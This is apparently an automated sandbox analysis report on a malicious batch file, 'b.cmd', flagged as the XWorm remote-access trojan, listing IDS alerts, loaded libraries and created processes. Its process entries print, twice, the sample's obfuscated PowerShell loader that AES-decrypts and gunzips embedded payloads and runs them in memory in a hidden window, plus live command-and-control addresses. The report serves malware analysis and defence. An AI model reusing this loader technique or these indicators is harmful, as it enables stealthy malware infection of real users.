2024-10-26T08:53:41.995606+0200	2852874	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:11.912869+0200	2852874	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:41.908904+0200	2852874	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:55:12.211600+0200	2852874	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:55:12.211666+0200	2852874	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-26T08:52:44.169598+0200	2853193	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for domain / URL

Source: dcxwq1.duckdns.org

Virustotal: Detection: 12%

Perma Link

Multi AV Scanner detection for submitted file

Source: b.cmd

ReversingLabs: Detection: 23%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 87.3% probability

Source:	Binary string: e.pdb source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDB source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdbY source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdba source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Nf.pdbA source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: G_FORCE_FREE_LIBRARY.pdb source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\Globalization\Sorting\sortdefault.nls	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SYSTEM32\MSVFW32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SYSTEM32\en-US\avicap32.dll.mui	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SYSTEM32\en-US\MSVFW32.dll.mui	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\wbem\en-US\wmiutils.dll.mui	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49732 -> 101.99.92.203:7000
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 101.99.92.203:7000 -> 192.168.2.4:49732
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49732 -> 101.99.92.203:7000
Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 101.99.92.203:7000 -> 192.168.2.4:49732
Source: Network traffic	Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49732 -> 101.99.92.203:7000

Uses dynamic DNS services

Source: unknown

DNS query: name: dcxwq1.duckdns.org

Source: global traffic

TCP traffic: 192.168.2.4:49732 -> 101.99.92.203:7000

Source: Joe Sandbox View

IP Address: 101.99.92.203 101.99.92.203

Source: Joe Sandbox View

ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: dcxwq1.duckdns.org

Source: powershell.exe, 00000008.00000002.1771404228.000001FCB7943000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1756758005.000001FCA7B5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1771404228.000001FCB780D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.1756758005.000001FCA9343000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1756758005.000001FCA7781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.o
Source: powershell.exe, 00000008.00000002.1756758005.000001FCA9159000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.1756758005.000001FCA9343000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.1756758005.000001FCA7781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.1756758005.000001FCA939E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.1756758005.000001FCA939E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.1756758005.000001FCA939E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.1756758005.000001FCA9343000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.1756758005.000001FCA8CB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.1771404228.000001FCB7943000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1756758005.000001FCA7A65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1771404228.000001FCB780D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1756758005.000001FCA939E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.1756758005.000001FCA9159000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000008.00000002.1756758005.000001FCA9159000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9B796E20	8_2_00007FFD9B796E20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9B79CA90	8_2_00007FFD9B79CA90
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9B79CA35	8_2_00007FFD9B79CA35
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9B7948FD	8_2_00007FFD9B7948FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9B79C93B	8_2_00007FFD9B79C93B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9B79F8D8	8_2_00007FFD9B79F8D8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9B79F50D	8_2_00007FFD9B79F50D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9B797CA0	8_2_00007FFD9B797CA0

Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2162
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2162			Jump to behavior

Source: classification engine

Classification label: mal84.troj.evad.winCMD@15/7@3/1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6108:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\dsOejpCEgmpWzw8P

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xaksudmg.0xf.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: b.cmd

ReversingLabs: Detection: 23%

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\b.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\b.cmd"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\b.cmd';$rWNT='DecpxHCopxHCmppxHCrespxHCspxHC'.Replace('pxHC', ''),'MaTGyrinTGyrMTGyroTGyrdTGyrulTGyreTGyr'.Replace('TGyr', ''),'CrYsKteYsKtateYsKtDYsKteYsKtcrYsKtypYsKttoYsKtrYsKt'.Replace('YsKt', ''),'Idnlzndnlzvdnlzokdnlzednlz'.Replace('dnlz', ''),'TraGoiknsfGoikoGoikrmFGoikinaGoiklBlGoikockGoik'.Replace('Goik', ''),'LoStkNadStkN'.Replace('StkN', ''),'FroMxWcmBaMxWcse6MxWc4StMxWcriMxWcngMxWc'.Replace('MxWc', ''),'EnrgYjtrrgYjyrgYjPorgYjinrgYjtrgYj'.Replace('rgYj', ''),'CqJGUopqJGUyqJGUTqJGUoqJGU'.Replace('qJGU', ''),'ElywTEeywTEmenywTEtAywTEtywTE'.Replace('ywTE', ''),'ReaMpXgdLMpXgineMpXgsMpXg'.Replace('MpXg', ''),'CeuHLheuHLangeuHLeExeuHLteeuHLnseuHLioneuHL'.Replace('euHL', ''),'SKlTEpliKlTEtKlTE'.Replace('KlTE', ''),'GzasmetzasmCuzasmrrzasmentzasmPrzasmocezasmszasmszasm'.Replace('zasm', '');powershell -w hidden;function OgEIm($Xyfkn){$KStrb=[System.Security.Cryptography.Aes]::Create();$KStrb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$KStrb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$KStrb.Key=[System.Convert]::($rWNT[6])('xA1+WTJaPCUsOeL/aM8gYjpdFXCHAzsSe7O9jqgG6tE=');$KStrb.IV=[System.Convert]::($rWNT[6])('o+k4tdVDsXdevRbseXqo5Q==');$OoABI=$KStrb.($rWNT[2])();$gCRFY=$OoABI.($rWNT[4])($Xyfkn,0,$Xyfkn.Length);$OoABI.Dispose();$KStrb.Dispose();$gCRFY;}function bkQvC($Xyfkn){$pXxPg=New-Object System.IO.MemoryStream(,$Xyfkn);$ztkwM=New-Object System.IO.MemoryStream;$RxDER=New-Object System.IO.Compression.GZipStream($pXxPg,[IO.Compression.CompressionMode]::($rWNT[0]));$RxDER.($rWNT[8])($ztkwM);$RxDER.Dispose();$pXxPg.Dispose();$ztkwM.Dispose();$ztkwM.ToArray();}$QaWhK=[System.IO.File]::($rWNT[10])([Console]::Title);$TOEth=bkQvC (OgEIm ([Convert]::($rWNT[6])([System.Linq.Enumerable]::($rWNT[9])($QaWhK, 5).Substring(2))));$kobGz=bkQvC (OgEIm ([Convert]::($rWNT[6])([System.Linq.Enumerable]::($rWNT[9])($QaWhK, 6).Substring(2))));[System.Reflection.Assembly]::($rWNT[5])([byte[]]$kobGz).($rWNT[7]).($rWNT[3])($null,$null);[System.Reflection.Assembly]::($rWNT[5])([byte[]]$TOEth).($rWNT[7]).($rWNT[3])($null,$null); "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\b.cmd"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\b.cmd';$rWNT='DecpxHCopxHCmppxHCrespxHCspxHC'.Replace('pxHC', ''),'MaTGyrinTGyrMTGyroTGyrdTGyrulTGyreTGyr'.Replace('TGyr', ''),'CrYsKteYsKtateYsKtDYsKteYsKtcrYsKtypYsKttoYsKtrYsKt'.Replace('YsKt', ''),'Idnlzndnlzvdnlzokdnlzednlz'.Replace('dnlz', ''),'TraGoiknsfGoikoGoikrmFGoikinaGoiklBlGoikockGoik'.Replace('Goik', ''),'LoStkNadStkN'.Replace('StkN', ''),'FroMxWcmBaMxWcse6MxWc4StMxWcriMxWcngMxWc'.Replace('MxWc', ''),'EnrgYjtrrgYjyrgYjPorgYjinrgYjtrgYj'.Replace('rgYj', ''),'CqJGUopqJGUyqJGUTqJGUoqJGU'.Replace('qJGU', ''),'ElywTEeywTEmenywTEtAywTEtywTE'.Replace('ywTE', ''),'ReaMpXgdLMpXgineMpXgsMpXg'.Replace('MpXg', ''),'CeuHLheuHLangeuHLeExeuHLteeuHLnseuHLioneuHL'.Replace('euHL', ''),'SKlTEpliKlTEtKlTE'.Replace('KlTE', ''),'GzasmetzasmCuzasmrrzasmentzasmPrzasmocezasmszasmszasm'.Replace('zasm', '');powershell -w hidden;function OgEIm($Xyfkn){$KStrb=[System.Security.Cryptography.Aes]::Create();$KStrb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$KStrb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$KStrb.Key=[System.Convert]::($rWNT[6])('xA1+WTJaPCUsOeL/aM8gYjpdFXCHAzsSe7O9jqgG6tE=');$KStrb.IV=[System.Convert]::($rWNT[6])('o+k4tdVDsXdevRbseXqo5Q==');$OoABI=$KStrb.($rWNT[2])();$gCRFY=$OoABI.($rWNT[4])($Xyfkn,0,$Xyfkn.Length);$OoABI.Dispose();$KStrb.Dispose();$gCRFY;}function bkQvC($Xyfkn){$pXxPg=New-Object System.IO.MemoryStream(,$Xyfkn);$ztkwM=New-Object System.IO.MemoryStream;$RxDER=New-Object System.IO.Compression.GZipStream($pXxPg,[IO.Compression.CompressionMode]::($rWNT[0]));$RxDER.($rWNT[8])($ztkwM);$RxDER.Dispose();$pXxPg.Dispose();$ztkwM.Dispose();$ztkwM.ToArray();}$QaWhK=[System.IO.File]::($rWNT[10])([Console]::Title);$TOEth=bkQvC (OgEIm ([Convert]::($rWNT[6])([System.Linq.Enumerable]::($rWNT[9])($QaWhK, 5).Substring(2))));$kobGz=bkQvC (OgEIm ([Convert]::($rWNT[6])([System.Linq.Enumerable]::($rWNT[9])($QaWhK, 6).Substring(2))));[System.Reflection.Assembly]::($rWNT[5])([byte[]]$kobGz).($rWNT[7]).($rWNT[3])($null,$null);[System.Reflection.Assembly]::($rWNT[5])([byte[]]$TOEth).($rWNT[7]).($rWNT[3])($null,$null); "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: e.pdb source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDB source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdbY source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp
